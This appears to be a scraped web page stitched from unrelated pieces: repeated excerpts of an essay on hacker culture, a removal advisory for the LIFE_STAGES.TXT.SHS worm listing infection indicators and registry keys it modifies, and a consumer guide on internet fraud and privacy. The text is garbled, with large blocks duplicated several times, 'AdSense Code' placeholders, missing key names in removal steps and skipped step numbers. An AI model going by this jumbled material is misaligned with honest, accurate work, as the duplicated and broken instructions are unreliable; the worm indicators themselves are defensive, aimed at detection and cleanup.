(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

AdSense Code

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

3. Boredom and drudgery are evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

4. Freedom is good.

5. Attitude is no substitute for competence.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

AdSense Code

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

3. Boredom and drudgery are evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

4. Freedom is good.

5. Attitude is no substitute for competence.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

What Is a Hacker?

AdSense Code

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

AdSense Code

The basic difference is this: hackers build things, crackers break them.

AdSense Code

The basic difference is this: hackers build things, crackers break them.

AdSense Code

Virus Name

IRC/Stages.worm

Aliases

I-Worm.Scrapworm

IRC/Stages.ini

LIFE_STAGES.TXT.SHS

ShellScrap Worm

VBS/LifeStages

VBS/Stages.14558

VBS/Stages.2542

VBS/Stages.worm

VBS_STAGES

This virus, technically a “worm”, infects when a user opens the attached .SHS file. Files with the extension .SHS are actually executable, like .EXE files, are called “shell scrap object” files, are used by Microsoft OLE (Object Link Embedding) code, and to our knowledge at this time should not normally be located anywhere on your PC or the network.

You can easily search for files with the .SHS extension. However, Windows systems are by default configured to hide the .SHS extension from view, even if the “show all file extensions” option in Windows Explorer has been selected. The Windows icon for .SHS files is similar to the text icon. The .SHS icon shows yellow in the middle of the icon and has a ragged bottom edge. See the below example showing the LIFE_STAGES.TXT.SHS file selected:

To the best of our knowledge at this time, this virus does not intentionally disable a PC or applications, or destroy graphics or other files. It does write copies of itself with the .TXT.SHS extension to all local and network drives to which it has “write” access. These files are randomly named (see below removal instructions) using a series of choices. It renames REGEDIT.EXE to RECYCLED.VXD and puts it in the Windows recycle bin.

HOW TO TELL IF YOUR SYSTEM HAS BEEN INFECTED

The simplest way to determine if you have the ‘LIFE_STAGES’ virus on you system, if you do not have the latest Virus scan software and virus data files, is to do a file search for LIFE_STAGES.TXT.SHS

1. Start by going to the STARTMENU

2. Select FIND\FILES OR FOLDERS

3. Entering ‘*.shs’ in the ‘NAMED’ box (without the quotes)

4. In the LOOK IN box, Select either “C:” or “LOCAL HARD DRIVES”(this will depend on how many local hard drive partitions you have)

5. Select ‘FIND NOW’.

The files will be located in several directories. But, if you find LIFE_STAGES.TXT.SHS or other files with the .SHS extension like the ones listed below anywhere on your system, you should assume your system is infected.

Other examples of files indicative of this virus infection (the words “SECRET”, “IMPORTANT”, “INFO”, “REPORT” and “UNKOWN” are used randomly with numbers):

c:\report.txt.shs

c:\My Documents\IMPORTANT.TXT.SHS

c:\WINDOWS\LIFE_STAGES.TXT.SHS

c:\WINDOWS\Start Menu\Programs\unknown_805.txt.shs

IF YOU FIND ANY OF THE ABOVE LISTED FILES DO NOT OPEN OUTLOOK OR EXCHANGE UNTIL YOU HAVE COMPLETED THE FOLLOWING STEPS! IF OUTLOOK OR EXCHANGE IS CURRENTLY OPEN ON YOUR SYSTEM, CLOSE IT IMMEDIATELY (YOU ARE SENDING INFECTED MESSAGES).

HOW TO CLEAN YOUR SYSTEM

Removal of the following files should clean the virus from your system. We have tested this process on multiple systems.

1. Use FIND\FILES OR FOLDERS to find the infected files using the same process you used above to find *.SHS

2. + keys to select all the files found by the search

3. Review the list of files. Make note of any that you will need to replace from backups or original copies. You may want to print this list before proceeding to the next step.

4. Press the key to remove the files, and select ‘YES’ to the ‘Confirm File Delete’ Message

Once all files with the .SHS files are removed, the following registry entries, which are modified by the virus, should be repaired as follows (take great care with these instructions; mistakes in modifying your registry can be difficult or impossible to recover from; if you are uncomfortable with these procedures, seek appropriate help):

1. Get a copy of REGEDIT.EXE from another, uninfected computer that runs the same version of Windows that your PC does and copy it to C:\WINDOWS.

2. Click START|RUN. Type REGEDIT and hit ENTER key

3. In the left panel, click the "+" to the left of the following:
HKEY_LOCAL_MACHINE, Software, Microsoft, Windows, CurrentVersion, RunServices

4. In the right panel, search for the registry key that contains the data value of
"C:\WINDOWS\WSCRIPT.EXE
C:\WINDOWS\SYSTEM\SCANREG.VBS".

5. In the right window, highlight the registry key that loads the file and press the DELETE key. Answer YES to delete the entry.

6. Repeat steps 2 to 4 using the following registry entry
HKEY_USERS/.DEFAULT/Software/Mirabilis/ICQ/Agent/
Apps/ICQ
Look for the key that contains the data value of:
Parameters=“C:\RECYCLED\DBINDEX.VBS”, Path="C:\WINDOWS\WSCRIPT.EXE", and Startup="C:\WINDOWS"

7. Repeat steps 2 to 3 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/
regfile/DefaultIcon
Look for the key that contains the data value of "C:\RECYCLED\RECYCLED.VXD,1"

8. In the right window, double click the registry key and an input box will pop out. Type C:\WINDOWS\regedit.exe,1 to this input box.

9. Repeat steps 6 to 8 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/regfile/
shell/open/command

10. Exit the registry.

11. Click START|SHUTDOWN. Choose "Restart" and click OK.

HOW TO CLEAN YOUR E-MAIL

If you don’t clean infected messages you may mistakenly open them in the future and re-infect your system.

DO NOT OPEN A MESSAGE TO DELETE IT!!!!!

1. Open Outlook

2. Go to the INBOX and Delete all Messages with the attachment LIFE_STAGES.TXT

Possible titles for these messages are:

“Fw: Funny”

“Fw: Jokes”

“Fw: Life Stages text”

The text of these messages should be “> The male and female stages of life.”

3. Go to SENT ITEMS and Delete all Messages with the subject LIFE_STAGES.TXT

4. Check any additional folders that you might have stored an LIFE_STAGES.TXT Message and delete them

5. With your mouse, Right Click on DELETED ITEMS and select ‘Empty “Deleted Items” Folder’. (Alternatively, if you need to keep any of your uninfected deleted messages, you can select only the infected messages and delete them.)

Your system should now be clean.

AdSense Code

Virus Name

IRC/Stages.worm

Aliases

I-Worm.Scrapworm

IRC/Stages.ini

LIFE_STAGES.TXT.SHS

ShellScrap Worm

VBS/LifeStages

VBS/Stages.14558

VBS/Stages.2542

VBS/Stages.worm

VBS_STAGES

HOW TO TELL IF YOUR SYSTEM HAS BEEN INFECTED

1. Start by going to the STARTMENU

2. Select FIND\FILES OR FOLDERS

3. Entering ‘*.shs’ in the ‘NAMED’ box (without the quotes)

4. In the LOOK IN box, Select either “C:” or “LOCAL HARD DRIVES”(this will depend on how many local hard drive partitions you have)

5. Select ‘FIND NOW’.

Other examples of files indicative of this virus infection (the words “SECRET”, “IMPORTANT”, “INFO”, “REPORT” and “UNKOWN” are used randomly with numbers):

c:\report.txt.shs

c:\My Documents\IMPORTANT.TXT.SHS

c:\WINDOWS\LIFE_STAGES.TXT.SHS

c:\WINDOWS\Start Menu\Programs\unknown_805.txt.shs

HOW TO CLEAN YOUR SYSTEM

Removal of the following files should clean the virus from your system. We have tested this process on multiple systems.

1. Use FIND\FILES OR FOLDERS to find the infected files using the same process you used above to find *.SHS

2. + keys to select all the files found by the search

3. Review the list of files. Make note of any that you will need to replace from backups or original copies. You may want to print this list before proceeding to the next step.

4. Press the key to remove the files, and select ‘YES’ to the ‘Confirm File Delete’ Message

1. Get a copy of REGEDIT.EXE from another, uninfected computer that runs the same version of Windows that your PC does and copy it to C:\WINDOWS.

2. Click START|RUN. Type REGEDIT and hit ENTER key

3. In the left panel, click the "+" to the left of the following:
HKEY_LOCAL_MACHINE, Software, Microsoft, Windows, CurrentVersion, RunServices

4. In the right panel, search for the registry key that contains the data value of
"C:\WINDOWS\WSCRIPT.EXE
C:\WINDOWS\SYSTEM\SCANREG.VBS".

5. In the right window, highlight the registry key that loads the file and press the DELETE key. Answer YES to delete the entry.

7. Repeat steps 2 to 3 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/
regfile/DefaultIcon
Look for the key that contains the data value of "C:\RECYCLED\RECYCLED.VXD,1"

8. In the right window, double click the registry key and an input box will pop out. Type C:\WINDOWS\regedit.exe,1 to this input box.

9. Repeat steps 6 to 8 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/regfile/
shell/open/command

10. Exit the registry.

11. Click START|SHUTDOWN. Choose "Restart" and click OK.

HOW TO CLEAN YOUR E-MAIL

If you don’t clean infected messages you may mistakenly open them in the future and re-infect your system.

DO NOT OPEN A MESSAGE TO DELETE IT!!!!!

1. Open Outlook

2. Go to the INBOX and Delete all Messages with the attachment LIFE_STAGES.TXT

Possible titles for these messages are:

“Fw: Funny”

“Fw: Jokes”

“Fw: Life Stages text”

The text of these messages should be “> The male and female stages of life.”

3. Go to SENT ITEMS and Delete all Messages with the subject LIFE_STAGES.TXT

4. Check any additional folders that you might have stored an LIFE_STAGES.TXT Message and delete them

Your system should now be clean.

AdSense Code

Virus Name

IRC/Stages.worm

Aliases

I-Worm.Scrapworm

IRC/Stages.ini

LIFE_STAGES.TXT.SHS

ShellScrap Worm

VBS/LifeStages

VBS/Stages.14558

VBS/Stages.2542

VBS/Stages.worm

VBS_STAGES

HOW TO TELL IF YOUR SYSTEM HAS BEEN INFECTED

1. Start by going to the STARTMENU

2. Select FIND\FILES OR FOLDERS

3. Entering ‘*.shs’ in the ‘NAMED’ box (without the quotes)

4. In the LOOK IN box, Select either “C:” or “LOCAL HARD DRIVES”(this will depend on how many local hard drive partitions you have)

5. Select ‘FIND NOW’.

Other examples of files indicative of this virus infection (the words “SECRET”, “IMPORTANT”, “INFO”, “REPORT” and “UNKOWN” are used randomly with numbers):

c:\report.txt.shs

c:\My Documents\IMPORTANT.TXT.SHS

c:\WINDOWS\LIFE_STAGES.TXT.SHS

c:\WINDOWS\Start Menu\Programs\unknown_805.txt.shs

HOW TO CLEAN YOUR SYSTEM

Removal of the following files should clean the virus from your system. We have tested this process on multiple systems.

1. Use FIND\FILES OR FOLDERS to find the infected files using the same process you used above to find *.SHS

2. + keys to select all the files found by the search

3. Review the list of files. Make note of any that you will need to replace from backups or original copies. You may want to print this list before proceeding to the next step.

4. Press the key to remove the files, and select ‘YES’ to the ‘Confirm File Delete’ Message

1. Get a copy of REGEDIT.EXE from another, uninfected computer that runs the same version of Windows that your PC does and copy it to C:\WINDOWS.

2. Click START|RUN. Type REGEDIT and hit ENTER key

3. In the left panel, click the "+" to the left of the following:
HKEY_LOCAL_MACHINE, Software, Microsoft, Windows, CurrentVersion, RunServices

4. In the right panel, search for the registry key that contains the data value of
"C:\WINDOWS\WSCRIPT.EXE
C:\WINDOWS\SYSTEM\SCANREG.VBS".

5. In the right window, highlight the registry key that loads the file and press the DELETE key. Answer YES to delete the entry.

7. Repeat steps 2 to 3 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/
regfile/DefaultIcon
Look for the key that contains the data value of "C:\RECYCLED\RECYCLED.VXD,1"

8. In the right window, double click the registry key and an input box will pop out. Type C:\WINDOWS\regedit.exe,1 to this input box.

9. Repeat steps 6 to 8 using the following registry entry
HKEY_LOCAL_MACHINE/Software/CLASSES/regfile/
shell/open/command

10. Exit the registry.

11. Click START|SHUTDOWN. Choose "Restart" and click OK.

HOW TO CLEAN YOUR E-MAIL

If you don’t clean infected messages you may mistakenly open them in the future and re-infect your system.

DO NOT OPEN A MESSAGE TO DELETE IT!!!!!

1. Open Outlook

2. Go to the INBOX and Delete all Messages with the attachment LIFE_STAGES.TXT

Possible titles for these messages are:

“Fw: Funny”

“Fw: Jokes”

“Fw: Life Stages text”

The text of these messages should be “> The male and female stages of life.”

3. Go to SENT ITEMS and Delete all Messages with the subject LIFE_STAGES.TXT

4. Check any additional folders that you might have stored an LIFE_STAGES.TXT Message and delete them

Your system should now be clean.

Frauds, Scams and Slams: Internet Fraud

AdSense Code

How Big Is The Internet Fraud Issue?

37.5 million inquiries in 6 months

Most common complaints

Internet auctions

Undelivered merchandise

Credit card fraud

How Big Is The Internet Fraud Issue?

The Internet offers consumers access to mass amounts of information, broad choices for shoppers, and easy ways to conduct everyday business transactions. Likewise, con artists recognize the potential of using the Internet to carry out the same fraudulent scams as conducted through the telephone and the mail. Continuous development of new technologies and sophisticated software makes it possible to commit new and innovative online crimes against unwary consumers.

The Internet Fraud Complaint Center began taking complaints on May 8, 2000. In the first six months of operation, 37.5 million persons had visited the site, 20,014 filings were made and 6,087 complaints of fraud were referred to law enforcement and regulatory agencies around the world. Two thirds of all the complaints involved auction fraud, followed by non-delivered merchandise at 23 percent, Credit and debit card fraud at 5 percent, other confidence fraud such as home improvement, multi-level marketing and investment scams were at 5 percent. Overall the mean loss to each consumer was $1259. The largest loss reported was $366,248. In Oklahoma, 13 percent of the fraud complaints from consumers related to Internet services and computer issues. Of the fraudulent complaints against Oklahoma Companies, 21 percent related to Internet auctions and 13 percent involved Internet services and computer complaints.

One of the Newest Internet Frauds

Computer Generated Charges

Internet Fraud

One of the newer frauds to surface is using the web to deliver computer-generated phone charges. Consumers can download a program from the web on the Internet to view pictures and later receive a huge telephone bill for international calls they never made. Unfortunately, the computer user did not know that the downloaded program was designed to disconnect their computers from their regular Internet service provider and reconnect them to the Internet through a phone number in Moldova, a part of the former Soviet Union. So a word of caution! Don’t download programs for websites unless you know that you are dealing with a reputable site.

Take caution with Internet Account Updates! When you receive an e-mail message that appears to be from your Internet Service Provider saying that your account information needs to be updated or that a credit card you used was invalid or expired and the information needs to be reentered, DON’T. Call your Internet Service Provider and inquire whether the e-mail was theirs. This will also alert the Internet Provider of the possibility that their service is being scammed.

Tips for Shopping on the Web

· Secure sites

· Companies you know and trust

· Check out the company

· Is the company licensed

· Say No to unsolicited ads

Tips for Shopping on the Web

· Shop at secure sites.

· Shop only with reputable companies that you know about.

· Know where the company is located.

· Before you buy from an online company, for the first time, request a catalog and look over the merchandise carefully.

· Note of their return and refund policies, and other services.

· Look for a description about their security procedures. If none are given, e-mail the company and ask for that information.

· Most reputable companies will post a privacy policy on the Web site.

· Use a secure browser, one that scrambles purchase information sent online. Computers come installed with a browser but additional free browsers can be downloaded from the Internet.

· Check whether the company is licensed or registered, and with whom.

· Never give your credit card number or bank account number unless you know the company is legitimate.

· Don’t be taken in by a nice website, (just as you wouldn’t judge a book by it’s cover).

· Do not respond to unsolicited ads on e-mail.

· Use a credit card or charge card.

The Fair Credit Billing Act protects online transactions. Consumers have the right to dispute charges and withhold payments until the creditor investigates the disputed charges. In the event that someone fraudulently intercepts and uses the card the consumer is liable for only $50 of any charges.

· Keep a copy of online orders.

Always print an order for merchandise and keep in your files, along with the order confirmation number. Online orders are covered by federal law Mail and Telephone Order Merchandise Rule. According to this rule, merchandise must be delivered within days unless other wise stated. If merchandise is delayed or back ordered, the company must notify you of the expected delivery date.

Maintain Privacy on the Web

· Safeguard passwords

· Personal Information

· Opt-Out-Option

· Caution about downloading programs

Maintain Privacy on the Web

Most online companies use software to collect information about you and may in turn sell that information to others. It is prudent that you take measures to protect your private information so that it isn’t shared with the world.

Safeguard passwords: Never give your password to anyone. Be creative, use at least an 8-character password that is not identifiable to you. Use combinations of letters and numbers. Never use a password based on a word from the dictionary. For example, a pet’s names, Prandell2, your favorite flowers, 4iris, or names of fruits, or vegetables. Never use any portion of your Social Security number, telephone number, nor family names or birth dates.

Personal Information: Deal only with reputable companies. Do not share any personal information such as name, address, telephone number, e-mail address, or Social Security Number unless you know what information is being collected, how it will be used and by whom. Caution your children and grandchildren not to disclose any personal information over the Web unless they check with you first.

Be cautious of what you download: Don’t download programs for music, pictures, cartoons, jokes, etc unless you know the integrity of the company.

Opt-Out-option: You can elect not to have your information shared with others over the Internet, just as you can with companies who use mail and telephone marketing services. Look for this option in the company’s privacy policy.

Sample Opt-Out Form Letter

Company Name

Company Address

RE Account Number:

Please be informed: I want to take advantage of the Opt-Out Option. Here are my instructions regarding the sharing or selling of information about my account or my personal information.

· You do not have my permission to sell or share my information with unaffiliated third parties.

· You do not have my permission to share my credit history or credit worthiness with any affiliate of your company.

· I do not want to get unsolicited sales offers from your company.

· Please remove my name from all of your marketing lists and from your databases.

· Please notify me that you have received this letter.

Your name

Signature

Address

How Much Can Internet Companies Learn While You Surf?

· Personal tastes

· Gender

· Telephone numbers

· Habits

· Interests

· Purchase history

· Sites you have searched

How Much Can Internet Companies Learn While You Surf?

Remember, thanks to cookies, web sites will recognize you when you visit a second time. They will know where you visited on their site, and also the length of your visit.

· Your likes

· Your dislikes

· Gender

· Home and work telephone number

· Your habits

· Purchase history

· Products searched for

The information gleaned from by snooping in your computer and tracking your surfing can be sold to both legitimate marketers and con artists who can create a profile of your personal information.

Activity: What Does the Internet Know About You?

· Search by name

· Telephone number

· Address

· Part of Social Security Number

Activity: What does the Internet know about you?

Privacy experts recommend that you periodically search your private information and see what’s out there. Search Google.com, Search Engine Watch.com, AltaVista, Ask Jeeves.com or other search engines. Some companies, such as Super Exhaustive Search, charge a fee. Try searching and see what comes up. You may be surprised. You very likely will find information, such as Social Security Numbers, Vehicle Identification Numbers, cars registered to all the people who have lived at your address, names of people who ever lived at your address, whether or not you own a gun, boat, airplane, ever filed for bankruptcy, have a professional license, have ever registered a trademark or patent or other information you would just as soon not have on the Web.

Try several different approaches.

· Try all variations of your name Example William J. Jones, Bill Jones, Bill J. Jones, Will Jones, Will J. Jones, even Jones, William etc.

· Search the first 8 digits of a credit card number (DO NOT USE ANY MORE THAN 8) You may find your credit card number out here somewhere.

· Try pieces of your Social Security Number (NEVER PUT IN THE WHOLE NUMBER).

· Try various combinations of your address or zip code.

· Try your telephone number written in a variety of ways 210-444-1010, or 201 444 1010.

One piece of information can lead to additional personal information about you. For example, a telephone number may lead to your home address. Even unlisted numbers turn up sometimes along with your address, past addresses, past telephone numbers Etc.

Ways Personal Information Gets on Web

· File-Sharing Network

· Downloading certain information -- music

· Snoop software

Some Ways that Personal Information Gets on the Web?

· File-Sharing Network —Someone signs up for an Internet service, such as a music-swapping program and later learns that by doing so this allowed your computer file to be accessed by a file-sharing network.

· If you use file-sharing programs, be careful because what information on your computer can be shared to the world

· Be cautions about downloading music, pictures, cartoons, or jokes

How to Protect Personal Information

· Say No

· Use computer not connected to Internet

· Store personal information on disk

· Antivirus software

· Never open unknown e-mail

· Password

How to Protect Personal Information

Say NO when a Web site asks if you want to save your password for your next visit. Online con artists pick up stored passwords then use them to get into your online accounts. They can then access your credit card numbers. How does this scam work? When you open an e-mail from a “friend Joe” who asks you to open an attachment to see a cartoon, funny story, joke, picture, etc., it then launches a program to systematically search for all user data including passwords stored on your computer. Then the program e-mails the information to other scam operators.

· To be completely safe, store personal information on a different computer that is not connected to the Internet.

· Store personal information on a zip disk or a floppy disk, that is removed from the computer.

· Use Antivirus Software.

· Never open unsolicited e-mail.

· Never store personal information on your hard drive.

· Choose unidentifiable passwords that include a combination of at least 8 letters, numbers, and characters.

· If you don’t recognize the name, delete the item.

What Can You Do if You Find Unwanted Information on the Web?

· Contact the site

· Search engine services

What Can You Do if You Find Unwanted Information on the Web?

First, contact the site where you found the information and demand that it be removed. Then contact the ISP for that site and alert them to the fact that the site is putting out inappropriate information. To find the ISP look up the site’s WOIS record at http://www.internic.net/cgi-bin/whois. Probably the best and quickest way to remove unwanted information is to use services offered by search engines, such as Google or Altavista. Links can be quickly removed. One such address is http://www.altavista.com/sites/help/contact/intro_help and then send e-mails to the appropriate addresses.

So just how much privacy do consumers have? Not much, actually one has little control over how much personal information is available to those willing to spend the time surfing.

How to Protect Your PC From Intruders

· File share control

· Port blocking service

· Quarantine e-mail attachments

· Cookie blocker

· Content blockers

How to Protect Your PC From Intruders

Firewalls protect your personal computer. With one click of the mouse you can lock your PC and stop traffic to and from the Internet. It is a good idea, when installing the firewall to use default settings because this feature blocks common threats to your PC.

· File share control, blocks unauthorized use of the Microsoft Windows Net BIOS services

· Smart alerts, notifies you when traffic was blocked

· Port blocking service, blocks unauthorized network traffic into or out of your PC

· Quarantine e-mail attachments, to help protect your PC against e-mail hacking and viruses

· Cookie blocker, some programs block cookies to help ensure your privacy when surfing the Web

· Content blockers, some programs allow parents to block access to custom specified activities.

What To Do If You Become an Internet Fraud Victim

Contact:

FBI Clearinghouse

National Fraud Information center

U.S. Securities and Exchange Commission

Federal Trade Commission

What To Do If You Become an Internet Fraud Victim

· Contact the FBI Clearinghouse that addresses all kinds of Online fraud. Contact www.ifccfbi.gov

· Contact the National Fraud Information Center at www.fraud.org and file a complaint online. The complaint will be forwarded to the appropriate law-enforcement groups.

· The U.S. Securities and Exchange Commission U.S. Securities and Exchange Commission deals with e-mail stock and securities fraud. Contact at www.sec.gov

· The Federal Trade Commission prosecutes online fraud. File a complaint at www.ftc.gov.

Information That You Should Know

Antivirus protection

Information That You Should Know

· Antivirus software doesn’t catch new viruses, update at least monthly or even better weekly.

You Can Take Action Against Online Sharing of Personal Information.

Voice your opinion. Some privacy advocates call for changes in the policies regarding the sharing of “public information”. Should “public information” shared freely by many agencies and businesses be allowed to include your Social Security Number? To make your opinion heard as to whether public records belong on the Internet, contact your state and federal lawmakers and tell them how you feel.

Is Big Brother Watching?

According to the American Management Association, 75 percent of all American companies now use some form of surveillance equipment to spy on employees. Today’s workplace is anything but private. Internet snooping software makes it easy for employers to spy on an employee in the workplace, viewing e-mail, and web access. Increasingly tougher liability laws, and sexual harassment laws have resulted in employers using technology, even videotaping of employee workspaces, including restrooms. Is it legal? Yes. According to Privacy Rights Clearinghouse, unless specifically stated otherwise, the company you work for can listen, watch and read your workplace communication.

How to Protect Personal Information

Say NO when a Web site asks if you want to save your password for your next visit. Online con artists pick up stored passwords then use them to get into your Online accounts. They can then access your credit card numbers. How does this scam work? When you open an e-mail from a “friend Joe” who asks you to open an attachment to see a cartoon, funny story, joke, picture, etc., it launches a program to systematically search for all user data including passwords stored on your computer. Then the program e-mails the information to other scam operators

· To be completely safe, store personal information on a different computer that is not connected to the Internet.

· Store personal information on a zip disk or a floppy disk, that is removed from the computer.

· Use Antivirus Software.

· Never open unsolicited e-mail.

· Never store personal information on your hard drive.

· Choose unidentifiable passwords that include a combination of at least 8 letters, numbers, and characters.

· If you don’t recognize the name, delete the item.

Prepared by

Janice M. Park PH.D.

Gerontology Specialist